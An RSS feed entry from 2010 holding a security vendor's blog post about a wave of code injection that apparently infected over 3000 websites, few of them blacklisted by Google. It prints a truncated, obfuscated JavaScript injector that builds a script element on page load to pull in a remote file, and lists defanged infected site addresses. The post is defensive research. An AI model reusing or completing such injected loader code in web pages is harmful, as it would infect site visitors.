<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>stopthehacker.com &#187; infected sites</title>
	<atom:link href="http://www.stopthehacker.com/tag/infected-sites/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.stopthehacker.com</link>
	<description>Jaal, LLC</description>
	<lastBuildDate>Tue, 07 Feb 2012 14:00:27 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Zero to 3000+ Infected Sites in Less Than 30 Minutes</title>
		<link>http://www.stopthehacker.com/2010/03/01/zero-to-3000-infected-sites-in-less-than-30-minutes/</link>
		<comments>http://www.stopthehacker.com/2010/03/01/zero-to-3000-infected-sites-in-less-than-30-minutes/#comments</comments>
		<pubDate>Mon, 01 Mar 2010 19:00:48 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blacklisted websites]]></category>
		<category><![CDATA[code injection]]></category>
		<category><![CDATA[infected sites]]></category>
		<category><![CDATA[malicious websites]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1402</guid>
		<description><![CDATA[Code injection attacks show no signs of abating. Everyday more than 6000 new websites are added to Google&#8217;s Safe Browsing List (blacklist). Hackers are compromising websites without the knowledge of the website owner to, in turn, infect website visitors. Malicious hackers don&#8217;t care if the website they infect is a small mom and pop operation [...]]]></description>
			<content:encoded><![CDATA[<p>Code injection attacks show no signs of abating. Everyday more than 6000 new websites are added to <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google&#8217;s Safe Browsing List</a> (blacklist). Hackers are compromising websites without the knowledge of the website owner to, in turn, infect website visitors.</p>
<p>Malicious hackers don&#8217;t care if the website they infect is a small mom and pop operation or a large e-business. They use automated &#8220;bots&#8221; in most cases, which will attack any and every website they can exploit. No website is off limits.</p>
<p>As an example of the rampant nature of this problem, we will show how we found over 3000 infected websites out of which only a small percentage seems to be blacklisted by current website reputation services. One of the most reliable reputation services, offered by Google, only managed to identify a small portion of the whole of the infected websites we mined using Google&#8217;s own search results. Identifying infected websites is not trivial.</p>
<p><strong>We recently saw a strong rise in the appearance of the malicious code below:</strong></p>
<pre class="brush: jscript; title: ; notranslate">
this.v=&quot;&quot;;:LineMixer [var i=15492;var y=window;var  o='';var op='';
var a='s*c*r:iVpTt:'.replace(/[\:

TVJ\*]/g, '');var  yx=new Array();
var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g,  '');
var _=new Array();this.nt=&quot;&quot;;]var k;if(k!='dh' &amp;&amp; k !=  '')
{k=null};y.onload=function(){var w;if(w!='' &amp;&amp;  w!='ns'){w=null};
try {this.n_=false;uh=document[u](a);var ow=&quot;&quot;;var  f=&quot;&quot;;
var xl=new String();var xf=&quot;xf&quot;;:LineMixer  [uh['s;rpcp'.replace(/[p;t6O]/g, '')]
='hHt4tVp4:5/V/4e4x4aHmViVnVe4
</pre>
<p>By searching for a small part of the above portion of this code on Google (shown below), we found a list of websites which harbor the above code. A simple mention of this code on the pages of a website does not necessarily imply that the website is bad. It could be that a website administrator was asking for clarification on help forum. However, a detailed (automated) examination is performed by our systems to remove any doubt.</p>
<pre class="brush: jscript; title: ; notranslate">
this.v=&quot;&quot;;:LineMixer [var i=
</pre>
<p>Interestingly, only 5.7% of the 3000+ infected sites we found exploited with this code were blacklisted by Google. This highlights the fact that even reliable blacklists, like the <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google&#8217;s Safe Browsing List</a> are not complete.</p>
<p>Till next time.<br />
<span id="more-1402"></span><br />
<strong>We show a small sample of the 3000+ infected websites below:</strong></p>
<pre class="brush: plain; title: ; notranslate">
hxxp://saipanlawyer.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://www.citydusk.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://de.pastebin.ca/1798028/    (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://www.hotel-ederhof.com/     (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://fast-weight-loss-plan.org/ (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/03/01/zero-to-3000-infected-sites-in-less-than-30-minutes/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

